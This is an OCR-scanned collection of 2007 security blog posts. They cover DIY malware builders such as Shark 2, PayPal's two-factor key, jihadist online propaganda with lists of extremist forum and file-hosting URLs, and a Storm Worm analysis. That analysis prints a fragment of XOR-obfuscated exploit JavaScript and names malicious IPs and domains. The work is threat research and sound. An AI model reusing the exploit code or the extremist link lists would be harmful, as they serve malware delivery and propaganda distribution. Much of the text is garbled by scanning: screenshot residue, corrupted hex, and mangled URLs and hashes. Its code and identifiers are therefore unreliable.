by [7]a massive discovered attack, or to build awareness on an advanced phishing scheme 
to come in a typical "focus on current instead on emerging trends" mindset. How would 
access to a namerserver be obtained if not by hacking into it? The never-ending underground 
economy’s supply of goods model indicates that certain goods such as access to breached 
FTP, Web and DNS servers change value over time through the release of such exploits. So 
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suddenly, an access to a namerserver gets a higher valuation than usual. I’ve been using a 
handy [8]Firefox add-on to keep track of the constantly changing IPs of various cyber jihadist 
forums and web sites for quite some time now. [9]The tool is actually pitching itself as [10]an 
anti-pharming add-on you ought to evaluate for yourself : 


"SCM performs Site Continuity Management validations on websites to help prevent Pharming 
attacks. Pharming attacks are an advanced form of Phishing where an adversary poisons the 
data held in the user’s DNS server. SCM is believed to be the first add-on to protect users from 
this advanced attack." 


. http://www.trusteer.com/docs/bind9dns. htm 

. http: //www.heise-security.co.uk/news/94220 

. http: //www.milwOrm.com/exploits/4266 

. http://www.heise-security.co.uk/news/9342 

. http: //www.heise-security.co.uk/news/9327 

. http: //www.ngssoftware.com/papers/ThePharmingGuide. pdf 
. http://isc.sans.org/diary .php?storyid=496 


. http: //www.priv8.co.uk/addons/SCM 


10. http://www. priv8.co.uk/addons/SCM/SCM.pd 


O AON OUBWN FB 


: 
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3.8.8 The Shark 2 DIY Malware (2007-08-16 12:27) 


[1]The Shark2 DIY malware (screenshots, its features, checksums of the builder, and the 
detection rates as of Saturday, 28th of July) finally made it though the mainstream media, as 
yet another [2]DIY malware builder in the wild, despite that the what’s promoted as [3]a RAT 
but is actually [4]a malware, has been around since November, 2006 : 


"The tool is being distributed via several underground internet forums. Software development 
is almost equivalent to that available from legitimate software vendors with regular updates 
to the code bringing the latest detected version up to version 2.3.2. Virus creation toolkits 
have been available for years, but have mostly been restricted to the creation of mass mailing 
worms and their ilk. [5]DIY phishing kits that dumb down the process of constructing fraudu- 
lent websites began about two years ago. Shark 2 makes the process of infecting targets for 
phishing attacks or performing other malign actions easier than ever. It means money making 
malware rackets are no longer the preserve of those with at least some programming skills." 


As I’ve already pointed out in numerous posts, the ongoing trend of disseminating DIY malware 
is mainly done in 
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EditServer [normal mode] 


yer settings 


startup methods > port: |2737¢ use random port 


reo F pelt server after 
notifications > BELh SEEVEE eEtee 
password: installation 
binded files > wait for reboot 
re-enter password: 
plugins > = 
Victim name: |¢.¢.3rv 
restrictions > random filename 
protect password: specify: 
e-nail > 
re-enter password: 
e icon/other > 


advanced mode| |save/load settings size: 55,881 bytes 


order to generate as much noise as possible thought the easy of use of such builders by the 
average script kiddies. And while the infamous [6]Sub7 DIY malware had the same features 
within its builder without, of course, Shark2’s anti-sandboxing capabilities, back in 2003 Sub7’s 
mission was more of a intellectual opportunism one, compared to today’s noise generation 
mindset of sophisticated malware authors wanting to remain as untraceable as possible. DIY 
malware builders evolved proportionally with the malware authors’ needs for [7]diversity of 
the way the malware "phones home" in order to get efficiently controlled and the data within 
the infected host efficiently abused. 


Every newly configured trojan variant thought the builder is an undetected piece of malware 
in terms of signatures based scanning, and always in the nasty combination with [8]malware 
packers and crypters. Even more interesting is the fact that the authors behind the trojan are 
also reading the news, and as always, periodically verifying the detecting rates of the builder, 
namely, the checksums of the new builder compared to the one [9]as of 28th of July that | 
provided have changed, and so is the detection rate for the latest release (15th of August) : 


Detection rate : 4 AVs out of 32 (12.5 %) detect it 
AntiVir 2007.08.15 TR/Sniffer.VB.C.2 

F-Secure 2007.08.15 Backdoor.Win32.VB.bax 

Kaspersky 2007.08.16 Backdoor.Win32.VB.bax 
Webwasher-Gateway 2007.08.15 Trojan.Sniffer.VB.C.2 
File size: 2506752 bytes 

MD5: e63498f392eed84b1c8a66dbb288d459 

SHA1: 5aa39b70d17d16055d8084e534806d8e26a37fda 


1 
2 
3; 
4 
5. 
6. 
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7. http: //ddanchev. blogspot .com/2007/03/botnet- communication-platforms.htm 
8. http: //ddanchev. blogspot .com/2007/07/more-malware-crypters-for-sale.htm 
9. http: //ddanchev. blogspot .com/2007/07/shark2-rat-or-malware.htm 


3.8.9 PayPal’s Security Key (2007-08-16 16:31) 


O Introduction 
O Extra Level of Security 


© Easy-To-Use Device 
endl 5 ERE 


[1]PayPal’s recently introduced Security Key two-factor authentication for the millions of its 
customers in cooperation with VeriSign’s growing centralization of [2]two-factor authentication 
in a typical OpenID style - Ebay’s also a partner - is adding an extra layer of security to the 
authentication process, it’s a fact. The entire strategy relies on the fact that, if a customer’s 
accounting details get keylogged, or they [3]fall victims into a phishing scam and provide the 
accounting data themselves, the phishers or malware authors wouldn’t be able to login since 
the key generated in the time of keylogging wouldn’t be active by the time the malicious 
parties use it the next time. PayPal’s Security Key : 


"Generates a unique six-digit security code about every 30 seconds. You enter that code when 
you log in to your PayPal or eBay account with your regular user name and password. Then 
the code expires - no one else can use it. [4]Watch the demo" 


However, given the spooky commitment from phishers and malware authors we’ve been 
witnessing for the last several years years, wouldn’t they entirely bypass this extra layer for 
authentication by basically purchasing the $5 Security Key and like legitimate customers, start 
generating security codes ending up with having both the accounting data, and the ability to 
generate valid access codes as well? Take E-banking for instance, the pseudo random key 
generators issued by different banks are supposed to have different algorithms for generating 
the codes, so that we never get the chance to discuss monocultural insecurities in two-factor 
authentication. Malicious parties are no longer interested in showing off as rocket scientists, 
but as a pragmatic and efficiency centered crowd. The way keylogging evolved into "[5]form 
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grabbing" and entire sessions hijackings of malware infected PCs right after the user herself 
authenticates though several factors based authentication, in this very same way malicious 
parties [6]started coming up with [7]ways of bypassing compared to directly confronting the 
security measures put in place. 


The flexibility of notifications for financial transactions via alert based system and static 


§ 4 oe 


Digipass GO 1 Digipass GO 2 Digipass GOS 
> 
209 i 
J J 
Digipass PRO Digipass PRO Digipass PRO 
250 260 


y | = 
Digipass PRO Digipass PRO Digipass Pro 
S50 $60 Seo 
Digipass Pro Digipass PRO Digipass PRO 
5385 700 $00 
Oigipass DESK Digipass DESK Digipars za 
300 850 SIM 
— 
| Soe 
\ } 
“ 
S ors Oe 
Digipass za Oigipass za Digipass za 
Pocket PC Palm Windows 
~*. 


Digipass Digipass Pack Digipass 
Programmer Authentication 


receipt of notices sent to a == 

mobile are an alternative. For instance, via the web interface of my E-banking provider | can 
set to receive an SMS when a given range of money come and go out of the account, sort of 
an early warning system for self-vigilance. What I’m missing is a historical "last logged from" 
feature, and the option to receive an SMS each and every time, | or maybe not me logs into the 
account. Features like these should be provided on an opt-in basis, and those customers truly 
perceiving the value of them will pay for the service. As always, the market delivers what the 
customer wants - two-factor authentication, and the irony from a psychological perspective is 
that in fact, those with less income are more vigilant for possible fraud attempts, than those 
with more income who are more gullible since they can afford the losses. 
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1. https://www.paypal.com/securityke 
2. http: //gizmodo.com/gadgets/gadgets/paypals-security-key-protects-you-from-phishers- 228824. php 


3. http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 
4 

5 

6. 

7. 


3.8.10 534 Biographies of Jihadist Fighters (2007-08-16 20:49) 


The Book of Martyrs 


Mage Alghanistan ‘ di “ 


Algeria 


‘He was 35 years old and 1AM Sa'd Bin-Ali al-chamici, a wellknown real estate 
and wood dealer in "Al-Hal" latte Bip aiitatseicerss> sion Pestgetc tester tates ratgetses 
Te amid the halls of the smilys ce inhis calm village, “Abd-al-Aziz" was only 17 
years old when he left the cde s wealthy family to take the first flight to Pakistan 
and join the camp of Arab y Iraq in 1997, cotee isthe seers re Sierers 
He followed the mujahideen Kashenir er 
(ieee eee 


Other Regions 


Palestine 


On the look for patterns of terrorist behaviour researchers often stereotype in order to portrait 
a terrorist. The Book of Martyrs (compiled in English on June 9th, 2007) is a great [1J]OSINT 
source for [2]analysts and intelligence agencies wanting to obtain data regarding the lifetime 
or jihadist martyrs, segmented on a per country basis, including photos, poems, interviews, 
transcripts, and links to multimedia files. [3]Much like the [4]Technical Mujahid E-zine, the 
[5]Mujahideen Harvest magazine, and the [6]Jihadist Security Encyclopedia, this E-book is a 
yet another handy source of [7JOSINT data, at least in respect to [8]jinhadist social networks : 


“Therefore, out of these 81 names: 40 are from the Arabian Peninsula, 7 from Yemen, 7 
from Syria, 5 from Algeria, 4 from Kuwait, 4 from Iraq, 3 from Turkey, 1 each from Bahrain, 
Bangladesh, Tunisia, Libya, France and the USA whilst the nationalities of the remainder are 
unknown. Theses figures correspond to the relative contribution of the Muslim Ummah towards 
the Jihad in the world today. Sadly, there are hardly any Muslims from Western nationalities 
and usually they are the most vocal in their slogans for Jihad.” 


A link to a video entitled "Russian Hell in the year 2000, Jihad in Chechnya Part One" 511MB is 
included : 


"At the time of release of this CD, (July 2000), nine months of the War have passed with no 
end in sight. Russian casualties stand at over 15,000 killed or missing in action (MIA) and over 
30,000 injured. They have lost hundreds of battle tanks, fighting vehicles and trucks and tens 
of fighter aircraft and helicopter gunships." 
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To a second video entitled "Russian Hell in the year 2000, Jihad in Chechnya Part Two" : 


"Exclusive, live film footage of two martyrdom operations carried out against Russian Barracks 
in Argun and Gudermes in July 2000 Combat footage of Mujahideen operations, ambushes and 
remote-control detonation of Russian Military vehicles throughout the Year 2000 Video of the 
nine OMON troops after they were executed due to the failure of the Russian Government to 
hand over the Russian War Criminal Colonel Yuri Budanov to the Mujahideen (April 2000)" 


And to a third one entitled "The Martyrs of Bosnia Part One and Part Two" : 


"This unique video by Azzam Publications, the first of its kind in the English language with 
real-life combat footage and the first of a four part series, narrates the biographies of some 
of these magnificent individuals, who sacrificed their own lives in order to bring life to those 
around them." 


Some interesting sections related to ITsecurity and anonymity as well : 
- Useful programs to protect personal information on computer and on-line 


Tor [Anonymous web-surfing] ; True crypt [File & disk encryption - better than PGP] ; Window 
Washer [Shred free space and files] ; Soy Sweeper [Spyware remover] ; Avast [Anti-virus pro- 
tection] ; Outpost [Computer Firewall] ; Winpt [secure encrypted email - better than PGP] ; 
Ad-aware professional [ Another spyware remover ] ; AbiWord [Open source - Better alterna- 
tive to Word] ; Enigmail 


- Best method to protect your chat! 


Use Gaim with OTR plugin and and configure to use TOR network ; Gaim [Encrypt your chat 
conversations]; Off-the-Record Messaging [OTR Plug-in] 


- Must have programs for your USB drive 


Mobility Email - Best option for sending secure encrypted emails ; GAIM - for secure chat con- 
versation ; Portable Firefox ; TorPark - for anonymous web browsing ; True Crypt - Best disk 
encryption & file protection program ; Tutorial for securing a USB drive using True Crypt ; Cyber 
Shredder : File wiping utility ; ClamWin [Open source anti-Virus Program] ; Greatnews - The 
Intelligent RSS Reader ; Foxit PDF Reader opens PDF files ; Abiword - full featured open source 
word processor ; Portable Open Office is really the only option for an Office Suite 


Propaganda and twisted reality and its best hosted at Archive.org, [9]courtesy of [10]Azzam 
Publications. 


ttp://ddanchev. blogspot .com/2006/09/benef its-of-open-source- intelligence. htm 
ttp://ddanchev.blogspot.com/2006/08/analyzing-intelligence-analysts.htm 


. http: //ddanchev.blogspot.com/2006/12/analysis-of-technical-mujahid-issue-one.htm 
. http://ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.htm 


10. http://news .bbc.co.uk/1/hi/uk/1823045.stm 


1. 
2: 
3 
4 
5. http://ddanchev.blogspot.com/2007/07/mujahideen-harvest-magazine-issue-41.htm 
6. 
Te 
8. 
9. 


989 


3.8.11 Analyses of Cyber Jihadist Forums and Blogs (2007-08-17 01:17) 


Where are cyber jihadists linking to, outside their online communities? Which are the [1]most 
popular file sharing and video hosting services used to spread propaganda, training material 
and communicate with each other? What are their favorite blogs, and international news 
sources? How does the Internet look like through the eyes of the cyber jihadist? This post will 
provide links to cyber jihadist communities, with the idea to aggregate a decent sample of how 
cyber jihadists use, and abuse the Internet to achieve their objectives. It is based on external 
URLs extraction of over 5,000 web pages directly related to cyber jihadist communities. The 
snapshot was obtained during the last 7 days, therefore if you’re to data mine the free online 
data hosting URLs, do so in a timely manner before they dissapear due to one reason or 
another. 


Key summary points : 


- Over 4,000 external URLs pointing to suicide bomber’s videos, propaganda, warfare, bomb- 
ings, recruitment, torture videos, and numerous other still not analyzed cyber jihadist forums 
and blogs 


- In between 500 to 600 web pages per domain were crawled based on their last modified data, 
namely the most current 500 to 600 posts 


- The sample consists of 14 jihadist blogs and forums 


- Depending on the online file storage service of choice, files will remain online forever if 
accessed at least once every 30-to-45 days, or by the time they don’t get removed due to 
their nature 


- Video multimedia is often released in a multi-video-format fashion, and multi-quality variants 
with respect to the file size 
- The crawled external URLs are in .txt format, in a one full URL per line format 


You are what you link to, so let’s assess the "tip of the iceberg" cyber jihadist communities 
online : 
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01. URL: [2]http://3asfh.net/vb 


Dates : Created 20-nov-2003 ; Updated 15-jun-2007; Expires 20-nov-2007 
DNS Servers : SERVER.3ASFH.NET; SERVER1.3ASFH.NET 


External URLs : [3]3asfh.net _vb.txt 
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02. URL: [4]http://alsayf.com/forum 
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Dates : Created 16-aug-200; Updated 16-aug-2006; Expires 16-aug-2011 


DNS Servers : NS2.MYDYNDNS.ORG; NS1.MYDYNDNS.ORG; NS3.MYDYNDNS.ORG 


External URLs : [5]alsayf.com _forum.txt 
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03. URL: [6]http://egysite.com/al2nsar 


Dates : Created 01-dec-2002; Updated 13-mar-2007; Expires 01-dec-2008 
DNS Servers : NS1.EGYHOSTING.COM; NS2.EGYHOSTING.COM; NS1.EGYWWW.COM; 
NS2.EGYWWW.COM 


External URLs : [7]Jegysite.com _al2nsar.txt 
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04. URL: [8]http://elshouraa.ws/vb 


Dates : Domain created on 2006-09-15 00:08:38; Domain last updated on 2006-09-15 
00:08:39 


DNS Servers : ns11.uae-dns.com; ns12.uae-dns.com 


External URLs : [9]elshouraa.ws _vb.txt 
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05. URL: [10]http://muslm.net/vb 


Dates : Created 25-oct-2000; Updated 21-jul-2007; Expires 25-oct-2007 


DNS Servers : NS1.MUSLM.NET NS2.MUSLM.NET 


External URLs : [11]muslm.net _vb.txt 
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06. URL: [12]http://w-n-n.net/ - DOWN as of yesterday, best sample 


Dates : Creation Date: 16-feb-2006; Updated Date: 13-aug-2007; Expiration Date: 16-feb- 
2009 


DNS Servers : A.NS.JOKER.COM; B.NS.JOKER.COM; C.NS.JOKER.COM; 


External URLs : [13]w-n-n.net.txt 
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07. URL: [14]http://minbar-sos.com 


Dates : Created 28-feb-2006; Updated 10-mar-2007; Expires 28-feb-2008 


DNS Servers: NS1.BRAVEHOST.COM; NS2.BRAVEHOST.COM 


External URLs : [15]minbar-sos.com.txt 
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08. [16]URL - Radical Muslim 
[17] External URLs [18] 
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09. [19]URL 
[20]External URLs 
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12. [27]URL 


[28]External URLs[29] 


1002 


13. [30]JURL 


© Tuesday, September 05, 2006 


As-Sahab Media Present :: An Invitation to Islam 


An Invitation to Islam 


An AsSahab Produced Video Featuring Dr. Ayoran al-Zawahiri and 
Acram the American AKA Adam Gadaln 


Azzam the American AKA, introduced and praised by 
al-Qaeda's number two, Dr. Ayman al-Zawahiri, 
appears in a forty-eight minute video produced by 
8s-Sahab, an al-Qaeda multimedia production 
organization, titled, “An Invitation to Islam,” which 
was distributed to the Internet today, Saturday, 
September 2, 2006. Zawahiri, regarding Gadahn, 
states: “And as our brother Azzam the American talks 
to you, he talks to you as one concerned about the fate 
which awaits his people, and as a perceptive person 
who wants to lead his people our of darkness into the 
light. So listen to him, because what he is talking to 
you about is serious and significant. He is talking to 
vou about the fate which awaits avery human. an 
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14, [33]URL 


[34]External URLs[35] 


Now, it’s up to your data mining and crawling capabilities. 
Related posts: 

[36]Cyberterrorism - don’t stereotype and it’s there 
[37]Tracking Down Internet Terrorist Propaganda 

[38]Arabic Extremist Group Forum Messages’ Characteristics 
[39]Cyber Terrorism Communications and Propaganda 
[40]Techno Imperialism and the Effect of Cyberterrorism 
[41]A Cost-Benefit Analysis of Cyber Terrorism 

[42]Current State of Internet Jihad 

[43]Characteristics of Islamist Websites 


[44]Hezbollah’s DNS Service Providers from 1998 to 2006 
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[45]Full List of Hezbollah’s Internet Sites 

[46]Internet PSYOPS - Psychological Operations 
[47]Cyber Traps for Wannabe jihadists 
[48]Mujahideen Secrets Encryption Tool 

[49]An Analysis of the Technical Mujahid Issue One 
[50]An Analysis of the Technical Mujahid Issue Two 
[51]Terrorist Groups’ Brand Identities 

[52]A List of Terrorists’ Blogs 

[53]Jinadists’ Anonymous Internet Surfing Preferences 
[54]Samping Jihadist IPs 

[55]Cyber Jihadists’ and TOR 

[56]A Cyber Jihadist DoS Tool 

[57]GIMF Now Permanently Shut Down 
[58]Steganography and Cyber Terrorism Communications 
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. http://www.hostfilez.com/download. php?file=8199e8d719c46da52324636463¢£ f30f3 
. http://press-release. blogspot. com/ 


ttp://www.mooload.com/new/file.php?file=file01/170807/1187360877/press-release.blogspot.com.txt&s=t 


21. http://mujahidfisabeelillah.wordpress.com/ 


ttp://www.mooload.com/new/file.php?file=file01/170807/1187360788/mujahidfisabeelillah.wodpress.com.txtks 
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23. http://www. hostfilez.com/download.php?file=a7e0e0bc8aa58d2fe6bf bfdfc29a8302 
24. http://inshallahshaheed.wordpress.com/ 


ttp://www.mooload.com/new/file. php?file=file01/170807/1187360658/inshallahshaheed.wordpress.com. txt&s=t 


26. http://www. hostfilez.com/download.php?file=f2343e36c7867 1cf£459b27df4af92ale 
27. http://caravanofmartyrs.wordpress.com/ 


ttp://www.mooload.com/new/file. php?file=file01/170807/1187360498/caravanofmartyrs.wordpress.com. txt&s=t 


29. http://www. hostfilez.com/download.php?file=93baaf04ed1fb8cf6ef6c599d6f5bd24 
30. http://almagribi.blogspot .com/ 


ttp://www.mooload.com/new/file.php?file=file01/170807/1187360365/almagribi. blogspot .com.txtks=t 


32. http://www. hostfilez.com/download.php?file=d44e0d44fbf43eed2e1aaf43829af444 
33. http://alkarnee.wordpress.com/ 
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44. http: //ddanchev.blogspot .com/2006/09/hezbollahs-dns-service-providers-from. htm 


. http: //ddanchev. blogspot .com/2006/12/full-list-of-hezbollahs-internet-sites.htm 


46. http: //ddanchev.blogspot.com/2006/09/internet-psyops-psychological. htm 
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. http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool.htm 
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54, rtp: //adanchev blogspot. con/ 2007/06 /sanp]ing-jihadiste-ipe. html 
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3.8.12 RATs or Malware? (2007-08-20 14:36) 


File About 

Server Build ma 
Connection 

IP/DNS Password admin 

Client Port = 197 Transfer Port 200 Passfrase begins withA 


Server ID Default 


Installation 


Copy file to Windows Folder System32 Folder Program Folder 
Autorun 

Keylogger 

Melt 


Build 


|] Build Server 

2 Set Default Settings 
Clear Data 

ie) Scan With Virustotal.com 


EXConnections | _ “Build Server | |..\Settings | Options | QaAbout | 
Status: Idle Connections: 0 Port: 0:0 


After the [1]Shark 2 DIY Malware got the publicity it deserved as perhaps the most recent 
and publicly obtainable [2]DIY malware, another DIY RAT has been gaining popularity amoung 
the script kiddies crowd for a while. Shark 2’s features and capabilities for "killing" anti virus 
software and tricking sandboxes are far more advanced than this RAT’s one, no doubt about 
it. However, what makes an impression in this one is the built-in capability to check the latest 
server against the most popular anti virus software engines. 


Detection rate for the latest builder : Result: 15/32 (46.88 %) 
File size: 2981888 bytes 

MD5: 5683024dbfd73d92c103d2ecc4f98258 

SHA1: 34d341df36582906eb5d18e12139478b8772ea64 


Detection rate for a previous version of the builder : Result: 9/32 (28.13 %) 
File size: 2426880 bytes 

MD5: 4343eb64b3d4836b5ef49643b3320112 

SHA1: beb6bd04d587f4253e5b26e4ba1827c8b200a214 


1007 


Detection rate for another version of the builder : Result: 23/32 (71.88 %) 
File size: 4860416 bytes 

MD5: Ofef106915b40cf1lc0a411a4f5aee4bb 

SHA1: a7alcl1bdd388c20964cf54db4607bf650d890562 


Detection rate for the first version of the builder : Result: 24/32 (75 %) 
File size: 2466304 bytes 

MD5: lee90062bebfe3dd9bbdd9d3c9fc1f6c 

SHA1: 2c02b76497dd3bfa00c313e9e4a0bd0d8b2893a6 


Another issue that deserves more attention is [3]VT’s opt-out feature for not distributing 
the sample to AV vendors "If checked, in case the file is suspicious of being malware we will 
not distribute it to antivirus companies." Any malware authors or script kiddies out there, 
wanting to measure the detecting rates for their release without providing the AVs not currently 
detecting it with a sample of it? Perhaps thousands of them. 


The line between RATs and malware is definitely getting thinner these days. 


1. http: //ddanchev. blogspot .com/2007/08/shark-2-diy-malware.htm 
2. http: //ddanchev. blogspot .com/2007/07/shark2-rat-or-malware .htm 
3. http://www. virustotal.com/ 


3.8.13 Offensive Storm Worm Obfuscation (2007-08-21 12:54) 


<Script Language="JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = ""; 
for (var i = 6 ; i < plain_str.length; ++i) xored str += String.fromCharCode(xor_ke 


plain _str.charCodeAt(i)); return xored_str; } IURSTIMIE RE Ce Tee sre ra ee 
kaspersky2(suck_dick again Sete erste 
“\x8O\xad\xaa\xad\xaa\xd6\xc1\xd2\x88\xcd\xcd\ x8 O\x9d\x8 B\xce\xcS\xd7\x8O\xet\xd2\xd2\xc1\xd 
\x89\x9bD\xad\xaa\xd6\xc1\xd2\x8O\xcd\xcS\xcd\xfF\xcé6\xcc\xc1\xc7\x8O\x9d\ x8 B\x9 B\x9b\xad\xaa 
xaa\xc6\xd5\xce\xc3\xds\xc9\xcf\xce\x8 8\xc8\x88\x89\x8 B\ xdb\xcd\xcd\x9d\xcd\xcd\x9b\ x8 O\xd3\ 
d4\xFa\xc9\xcd\xcS\xcf\xd5\xd4\x88\x82\xc8\x88\x89\x82\x8c\x8 OY x92\ x9 B\ x9 B\ x9 BY xB9\x9b\xdd\x 
a\xad\xaa\xc6\xd5\xce\xc3\xd4\xc9\xcf\xce\x8 6\xc7\xc5\xd4\xc2\x88\xc2\x8c\ x8 O\xc2\xF3\xc9\xd 
\x89\xad\xaa\xdb\xd7\xc8\xc9\xcc\xc5\x86\x88\xc2\x8e\xcc\xc5\xce\xc7\xd4\xcB\xBa\x92\x9c\xc2 
xc9\xda\xcS\x89\xdb\xc2\x8 B\x8b\x9d\ x8 O\xc2\x9b\xdd\xad\xaa\xc2\x8O\x9d\ x8 O\xc2\x8e\xd3\xd5\ 
d3\xd4\xd2\xc9\xce\xc7\x88\x9 O\x8c\xc2\xF3\xc9\xda\xc5\x8F\x92\ x89\ x9D\ xd2\xc5\xds\xd5\xd2\x 
O\xc2\x9b\xdd\xad\xaa\xad\xaa\xc6\xd5\xce\xc3\xd4s\xc9\xcf\ xce\ x8 O\xc3\xc6\x88\x89\xad\xaa\xd 
\KXC1\xd2\x8 B\xda\xc3\x8 B\x9d\ x8 O\X9 BY Xd8B\ x9 BY xXC4\ x9 BY XC4\ x9 B\XCA\ XI B\XC4\x9bD\xad\xaa\xd6\xc1 
XSO\XCTVXBO\XOd\ XB O\xd5S\xce\xcS\xd3\xc3\xct\xdB\xc5\x88\ x82\x85\ xdS\ x94 x93 xOuV x93 \x85\xd5\ 
DS\X9OUVXISLKBSLxdS\ x9 BY XCO\KCS\XC2\KBS\Xd5S\X9SLK9S\ KOS KC2\KB5\ xd5S\X9O\K9O\ KCI KOOL KBS\ xd5\x 
BAXC2A\X9O9O\XBS\xdS\x9OB\ x9 BY x9 OV X91 x85 \xdS\xcS\xc6\x93\x93\x82\ x8 O\x8b\xad\xaa\x82\x85\xd5\xc 
\KOAAROSAKBS\xdS\xcS\xc2\xc6\xct\x85\xdS\xcS\x98\ x9 OV x95 \ x85 \xd5\xcé\xcé\xcS\xc3\x85\xd5\xcéb 
xC6\xc6\x85\xdS\x9B8\xc2\x97\xc6\x85\xd5\xc4\xc6\x9s\xc5\x85\xd5\xcS\xc6\xcS\xc6\x85\xd5\x96\ 
cS\xc6\x85\xd5\xcS\x93\xct1\xc6\x85\xdS\x99\ xc6\x96\x9h\ x85 \ xd5\ x94 x92\xc6\x93\xB5\xd5\x99\x 
6\xX94S\x85\xd5\x96\xcS\xc5\x97\x85\xd5\xc5\xc6\x9 B\x93\x85\xd5\xcS\xc6\xc5\xc2\x82\x8O\x8b\xa 
\xB2\x85\xd5\x96\x9S\xc5\xc6\x85\xd5\xc2\x99\ x9 BY x93\ xB5\ xd5\x96\ x91 \x9B\ x97 \ x85 \xd5\xc5\x91 
X9TVKBS\XdS\ XP B\XO7\ x9 B\K9S\KBS\xdS\xXcS\xcO\x9T\x91\x85\ xd5\xc5\xc6\xcS\xc6\xB5\xd5\xct\xct\ 
DO\XBS\XAS\XCALK99\XCS\XC2\KB5S\ KAS \ X97 \ X97 XOBLXO ZL XBS\ KGS \XIG\XISV KITV KOT KBS\ KGS \ KOO K97\X 
TVKBS\KdS\XCS\XCOLKOTLXCO\L X85 \xd5\xc5S\xc6\xc5\xc6\x85\xd5\ xe 1\ xc 1\x96\x96\xB5\xd5\xc2\x99\xc 
\X82\ x8 B\x8D\xad\xaa\ xB2\x85\xd5\xXc3\XcT\xX9B\ X97 \ x85 \ xd5\ x91 XPO\XIS\XCOLXBS\Xd5\ x9 B\ x97 \ x92 
XBS\KAIS\XCS\KCOLX9 BL XCEL X85 \ xd5\ xcS\XCOLXCS\XCOLXBS\XG5\ XC T\XCTVX9O\X9IGLKBS\ KGS xc2\x99\ xcs) 
SS\XdS\ XI O\XO BL KOB\KO7\ X85 \xd5S\ x9 BL xcO\xP2\xOTVx85\xd5\ x9 B\ x97 \x98\xcO\xB5\xdS\xcS\xc6\x93\x 
SA\xdS\xcS\xc6\xcS\xc6\x85\xd5\xct\xct\ x96, x96, x85 \xd5\xc2\x99\ xc6\xc6\x85\xdS\x92\xcS\x9s\ xo 
\xdS\x9 O\xc1\x99\x96\x82\x8 B\x8b\xad\xaa\x82\x85\xd5\ x9 B\ x97 \x9OS\xO7\ x85 \xdS\xcS\xc6\x92\ x99 
xd5\xcS\xc6\xcS\xc6,x85\xd5\xcit\xct\x96\ x96 \ x85 \xd5\xct\xc6\xc6\xc2\x85\xdS\xchy\ x97 \x96\xc6\ 
dS \x99\xc1\x92\xc3\x85\xd5\x96\x96\x91\ x95 \ x85 \xd5\xc6\x97\xc1\xc1\x85\xdS\xcS\x98\ x9 B\x96\x 
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Malware authors, often pissed off at the detection rates of their malware releases, tend to 
include offensive comments or messages within the malware’s code against anti virus vendors. 
At this Storm Worm URL we see offensive function within the obfuscated exploit aiming at 
Kaspersky. 


The [1]recent Storm Worm campaign may indeed look like a huge security threat given 
the millions of emails sent, however, | feel [2] more awareness should be built on the fact that 
[3]the malware has slightly adapted, and is using browser based vulnerabilities (client side 
one) to automatically push the binary onto the host, compared to the urban legend of not 
openning email attachments from unknown parties. The current Storm Worm’s main benefit in 
terms of efficiency is the client side exploited vulnerabilities within each and every malicious 
IP, and the main weakness is the pattern based nature of the binaries hosted at the IPs such as 
maliciousIP/file.ohp and maliciousIP/ecard.exe, thefore periodically verifying the checksums 
of the still active Storm Worm IPs results in new malware variants. Or starting from the basic 
premise that prevention is better than the cure, Bleedingthreats have already released [4]IDS 
signatures for the Storm Worm : 


"This first list has over 800 servers that are confirmed hostile, and were active in the 
last 24 hours. [5]http://www.bleedingthreats.net/rules/bleeding-storm.rules 

And a version prebuilt with a 30 day Snortsam block: 

[6 ]http://www. bleedingthreats.net/rules/bleeding-storm-BLOCK.rules 

We'll be collating Storm related links and data sources on the following page which is refer- 
enced in these sigs: 

[7 ]http://doc. bleedingthreats.net/bin/view/Main/StormWorm" 


Let’s assess yet another Storm Worm infected PC and reveal yet another campaign called 
BYDLOSHKA : 


01. 75.37.132.98 is using the [8]Q4-06 Roll-up package exploits kit like all Storm Worm 
URLs 


02. The downloader makes a DNS query to fncarp.com (24.1.243.46) where we have 
a second offensive obfuscation and the BODLOSHKA campaign under the following 
URLs : snlilac.com/ind.php (123.236.116.111) ; eqcorn.com/ind.php (66.24.211.96) ; fn- 
carp.com/ind.php The downloaders here obtain the actual binaries from a third party 
(81.9.141.13) creating a fast-flux network. 


03. What’s interesting and rather disturbing is a proof that [9]phishers, spammers and 
malware authors indeed work together, as Storm Worm is also comming in the form of 
phishing emails where the main objective isn’t to steal confidential accounting data, but to 
only infect the users visiting the site (74.102.159.188) 


All this leads me to the conclusion that the campaign may in fact be a Russian opera- 
tion. 


Related posts: 

[10]Oh boy, more Nuwar tricks! 
[11]New Storm Front Moving In 
[12]Zhelatin/Storm changes yet again 
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http: //ddanchev. blogspot .com/2007/08/storm-worm-malware-back- in-game .htm 


ttp://ddanchev. blogspot .com/2007/02/storm-worm-switching-propagation.htm 


_http://adanchev. blogspot .con/2007/04/social~engineering-and-nalvare.htal 

| http:/ /wmy. bleedingthreats net/index.php/2007/07/19/storn-vorm-ignature/ 

_ fxep://avy, bleodingehroate snst/ruleo/tlesding-storn.ruled 
_hetp://wiy,bleedingehreats.net/rules/+Leeding-store-BLOCK. ruled 

. http: //doc.bleedingthreats .net/bin/view/Main/StormWorm 

_http:/ /way.dragoslungu. con/2007/03/32/top--web-exploita-for~febriary-2007/ 
_http://any. delreporte .con/forun/19016715-Phish-Login-Infornation 


. http: //www.avertlabs.com/research/blog/index . php/2007/08/21/oh-boy-more-nuwar-tricks/ 


. http: //www.symantec.com/enterprise/security_response/weblog/2007/08/new_storm_front_moving_in.htm 
12. http: //www.f-secure.com/weblog/#0000125 


3.8.14 Excuse Us for Our Insecurities (2007-08-22 14:01) 


blog - crypto.com - quut.com 


WHAT DO YOURE ONLY THAT'S ONLY our WE DON'T 

YOU HAVE HELPING THERE FOR CUSTOMERS COMMENT ON 

AGAINST THE BAD GUYS BACKWARD LOVE SECURITY 
us? COMPATIBILITY OUR PRODUCT MATTERS 


WE READ WE MEET ALL LA, LA, LA IT DOESN'T No 
SCHNEIER'S GOVERNMENT WERE NOT NEED TO BE COMMENT 
BOOK STANDARDS LISTENING VERY SECURE 


Sa YOU MUST BE WE MEET ALL WE'RE FULLY 
FEATURE INDUSTRY 180-9001 
OUR USERS STANDARDS COMPLIANT 
‘WANT COMPETITION 


EVERYBODY YOU'LL BE YOU ARE IN YOURE BEING 
